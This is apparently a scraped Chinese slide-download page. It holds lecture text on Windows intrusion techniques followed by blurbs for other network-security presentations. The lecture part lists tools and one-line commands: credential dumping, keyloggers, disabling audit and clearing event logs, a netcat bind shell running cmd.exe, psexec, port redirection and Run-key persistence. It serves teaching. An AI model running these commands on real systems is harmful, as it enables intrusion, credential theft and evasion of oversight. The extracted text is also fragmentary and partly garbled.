通過SMB遠(yuǎn)程提取口令字密文破解口令字 L0phtcrack工具多種導(dǎo)入SAM數(shù)據(jù)方式: 本地注冊表、原始SAM文件、SAM備份文件、網(wǎng)絡(luò)監(jiān)聽口令字密文、L0phtcrack數(shù)據(jù)文件、pwdumpX輸出文件字典破解、蠻力破解、混合式破解分布式破解: 并行破解 LanMan密文破解: 最早被破解 John the Ripper 免費(fèi)破解Unix/Linux、Window LanMan口令字缺陷：只能破解LanMan密文竊取敏感信息-登錄口令 LSADump LSA Secrets將登錄其他系統(tǒng)的資料未經(jīng)加密存放在本地系統(tǒng). 某些服務(wù)帳戶的明文口令字最新10位用戶的口令字密文緩存 FTP、Web用戶明文口令字 Remote Access Service撥號帳戶名字和口令字用來訪問域控制器的計算機(jī)帳戶口令字 lsadump2利用DLL注入提取LSA Secrets內(nèi)容 查看登錄信息緩存區(qū) 10個最近登錄用戶的口令字密文: HKLM\SECURITY\CACHE\NL$n CacheDump， cachebf 竊取敏感信息-用戶數(shù)據(jù)用戶文件－文件搜索 find工具：find “password”*.txt findstr grep: Windows Resource Kit 用戶輸入鍵擊記錄器: keylogger (IKS， …) 抓屏監(jiān)控: 網(wǎng)銀木馬 GINA木馬: 木馬化登錄界面，竊取登錄用戶密碼 FakeGINA 用戶程序信息：軟件License， QQ/網(wǎng)絡(luò)游戲“信封”， … 盜號木馬網(wǎng)絡(luò)交換信息：明文密碼等 snort/Snifferpro/tshark， fsniff/dsnif Windows掩蹤滅跡關(guān)閉審計功能查看目標(biāo)系統(tǒng)的審計策略管理審計功能: Resource Kit中的auditpol auditpol /disable 干完壞事后auditpol /enable恢復(fù)審計功能清理事件日志 elsave工具－清除事件日志 elsave -s \\HOST -l “Security”–C Windows掩蹤滅跡(2) 隱藏文件隱藏屬性: attrib +h

NTFS文件流隱藏：cp HOSTFILE: 提取：cp HOSTFILE: 隱藏文件防范措施修改資源瀏覽器配置，查看所有資源 Windows遠(yuǎn)程控制和后門命令行遠(yuǎn)程控制 TCP/IP瑞士軍刀-netcat 服務(wù)器端(目標(biāo)主機(jī)): nc -L -d -e cmd.exe -p PORT 客戶端(攻擊機(jī)): nc HOST PORT 通過SMB服務(wù)-psexec psexec \\HOST -u admin_user -p pass comm 圖形化遠(yuǎn)程控制 Windows遠(yuǎn)程桌面-TCP 3389 VNC: 服務(wù)器端WinVNC， 服務(wù)器端VNCViewer 商業(yè)軟件: RemoteAdmin， PCAnywhere 國產(chǎn)軟件: 冰河、灰鴿子 Windows遠(yuǎn)程控制和后門端口重定向-繞過防火墻過濾 fpipe: TCP源端口轉(zhuǎn)發(fā)/重定向工具 fpipe -v -l 53 -r 23 HOST 將TCP 53端口上的通信轉(zhuǎn)發(fā)給23端口telnet 可以指定源端口后門藏身之地: ASEP－自啟動擴(kuò)展點(diǎn)注冊表啟動項(xiàng) HKLM\SOFTWARE\Microsoft\Window\CurrentVersion\Run， RunOnce … 啟動子目錄 … CpN紅軟基地

網(wǎng)絡(luò)信息安全論文PPT作品：這是一個關(guān)于網(wǎng)絡(luò)信息安全論文PPT作品，主要介紹網(wǎng)絡(luò)安全？誰關(guān)注安全？網(wǎng)絡(luò)信息安全主講：唐屹 博士 教授辦公室：行政西前座440室電話：13808876629 誰關(guān)注安全？政府？誰關(guān)注安全？機(jī)構(gòu)？誰關(guān)注安全？個人？誰關(guān)注安全？大家都關(guān)注！區(qū)別只是角度不一樣！我們這個課程也關(guān)注！希望通過72學(xué)時，能夠關(guān)注并了解基本的網(wǎng)絡(luò)安全攻防技術(shù) 基本的系統(tǒng)安全攻防技術(shù) 基本的Web安全攻防技術(shù)當(dāng)然，沒有攻擊，就沒有防御。要了解網(wǎng)絡(luò)攻防技術(shù)攻是第一位的你不會攻擊，并不意味著別人不會攻擊你不知道攻擊的途徑，你又怎么知道如何防御呢？但是，法律，法規(guī)…… 教學(xué)方式與考試要求課堂教學(xué)信息安全技術(shù)實(shí)驗(yàn)項(xiàng)目杜絕抄襲成績計算 70%考試成績 20%信息安全技術(shù)實(shí)驗(yàn) 10%考勤參考資料雖然有本很實(shí)用的教材，但依然需要與時俱進(jìn)，歡迎點(diǎn)擊下載網(wǎng)絡(luò)信息安全論文PPT作品哦。

網(wǎng)絡(luò)信息安全的重要性PPT作品：這是一個關(guān)于網(wǎng)絡(luò)信息安全的重要性PPT作品，主要介紹了什么是信息、什么是網(wǎng)絡(luò)、什么是網(wǎng)絡(luò)信息安全、學(xué)科內(nèi)容、授課內(nèi)容等內(nèi)容。網(wǎng)絡(luò)信息安全緒論：什么是網(wǎng)絡(luò)信息安全本節(jié)內(nèi)容什么是信息什么是網(wǎng)絡(luò)什么是網(wǎng)絡(luò)信息安全學(xué)科內(nèi)容授課內(nèi)容什么是信息科學(xué)家說：信息是不確定性的減少，是負(fù)熵老百姓說：信息是讓你知道些什么的東西安全專家說：信息是一種資產(chǎn)，它意味著一種風(fēng)險老百姓說：不怕賊偷，就怕賊惦記信息內(nèi)容和信息載體信息內(nèi)容和信息載體的關(guān)系，好比靈魂和肉體的關(guān)系同一個內(nèi)容，可以用多種載體承載不同的內(nèi)容，可以用同一載體承載信息可以被—— 創(chuàng)建輸入存儲輸出傳輸（發(fā)送，接收，截�。┨幚恚ň幋a，解碼，計算）銷毀 一個例子: S先生和P先生的故事一個例子: S先生和P先生的故事信息的要害是改變知識狀態(tài)什么是網(wǎng)絡(luò)網(wǎng)絡(luò)確保信息按需有序流動的基礎(chǔ)設(shè)施傳輸網(wǎng)絡(luò)基礎(chǔ)電信網(wǎng)、基礎(chǔ)廣電網(wǎng)互聯(lián)網(wǎng)絡(luò)互聯(lián)網(wǎng)（因特網(wǎng)）、內(nèi)聯(lián)網(wǎng)、外聯(lián)網(wǎng)人際網(wǎng)絡(luò)關(guān)系網(wǎng)、銷售網(wǎng)、間諜網(wǎng)什么是安全 Security: 信息的安全 Safety: 物理的安全 Security的含義在有敵人（Enemy）/對手（Adversary）/含敵意的主體（Hostile Agent）存在的網(wǎng)絡(luò)空間中，確保己方的信息、信息系統(tǒng)和通信不受竊取和破壞，按照需要對敵方的信息、信息系統(tǒng)和通信進(jìn)行竊取和破壞的“機(jī)制”（Mechanism）什么是網(wǎng)絡(luò)信息安全在網(wǎng)絡(luò)環(huán)境下信息資產(chǎn)（信息、信息系統(tǒng)、通信）的可能面臨的風(fēng)險的評估、防范、應(yīng)對、化解措施。技術(shù)措施（采用特定功能的設(shè)備或系統(tǒng)）管理措施（法律、規(guī)章制度、檢查）三分技術(shù)七分管理網(wǎng)絡(luò)信息安全的要害網(wǎng)絡(luò)信息安全的要害就是防止通過改變知識狀態(tài)來造成不希望的后果對信息進(jìn)行竊取，會使竊取者知道信息擁有者不希望他知道的事情對信息進(jìn)行破壞，會使信息的擁有者失去對信息的擁有，不再知道他本來知道的事情背景網(wǎng)絡(luò)的普及對網(wǎng)絡(luò)的依賴加深攻擊的門檻降低攻擊資源的廣泛存在實(shí)施攻擊的難度大大降低維護(hù)國家主權(quán)和社會穩(wěn)定、打擊網(wǎng)上犯罪、引導(dǎo)青少年健康上網(wǎng)（過濾與監(jiān)控）網(wǎng)絡(luò)信息資源的綜合利用（情報獲取與分析）網(wǎng)絡(luò)信息對抗和網(wǎng)絡(luò)信息戰(zhàn)網(wǎng)絡(luò)信息安全的CIA模型，歡迎點(diǎn)擊下載網(wǎng)絡(luò)信息安全的重要性PPT作品哦。

企業(yè)網(wǎng)絡(luò)信息安全的重要性PPT：這是一個關(guān)于企業(yè)網(wǎng)絡(luò)信息安全的重要性PPT，主要介紹了企業(yè)信息網(wǎng)絡(luò)安全問題概述、企業(yè)信息網(wǎng)絡(luò)安全分析、市場競爭需要加強(qiáng)信息安全管理、如何解決企業(yè)信息網(wǎng)絡(luò)安全問題、重點(diǎn)要解決的問題、內(nèi)網(wǎng)安全監(jiān)控軟件介紹、產(chǎn)品種類及服務(wù)介紹等內(nèi)容。如何加強(qiáng) 企業(yè)信息網(wǎng)絡(luò)安全管理 融信科技 程孝龍合作方：公安部第三研究所信息網(wǎng)絡(luò)安全研發(fā)中心國家反計算機(jī)入侵和防病毒研究中心一、企業(yè)信息網(wǎng)絡(luò)安全問題概述 信息是一種資源�？蛻粜畔�、財務(wù)信息、人事信息和技術(shù)信息等對一個企業(yè)來說是十分重要的。信息與物質(zhì)和能量一起構(gòu)成企業(yè)生存和發(fā)展的基礎(chǔ)。電腦網(wǎng)絡(luò)、辦公自動化、電子政務(wù)帶來高效、方便。也帶來信息安全問題。 在處理、使用和保存信息的過程中存在那些不可忽略的安全問題？例如：對內(nèi)部網(wǎng)絡(luò)的電腦上網(wǎng)、聊天、游戲等行為難以管理。對機(jī)密文件上傳下載等管理漏洞較大。經(jīng)常存在惡意代碼、病毒和黑客的攻擊。不能及時進(jìn)行漏洞掃描和補(bǔ)丁管理。二、企業(yè)信息網(wǎng)絡(luò)安全分析 隨之而來的網(wǎng)絡(luò)攻擊、數(shù)據(jù)泄密、客戶資料被竊、辦公室變成網(wǎng)上游樂場、計算機(jī)黑客或病毒入侵公司，以及電郵泛濫等問題和事件時有發(fā)生。那么如何才能充分滿足對機(jī)密數(shù)據(jù)的安全防護(hù)和電腦非法行為的監(jiān)控與管理？ 目前我國有幾十萬個政府機(jī)關(guān)和大中型企業(yè)都在思考，如何才能很好地解決內(nèi)網(wǎng)的安全監(jiān)控管理問題。尤其象各級黨政機(jī)關(guān)、軍隊(duì)、金融、公安、電信、民航、鐵路、交通、大中型企業(yè)等用戶的需求更為迫切，歡迎點(diǎn)擊下載企業(yè)網(wǎng)絡(luò)信息安全的重要性PPT哦。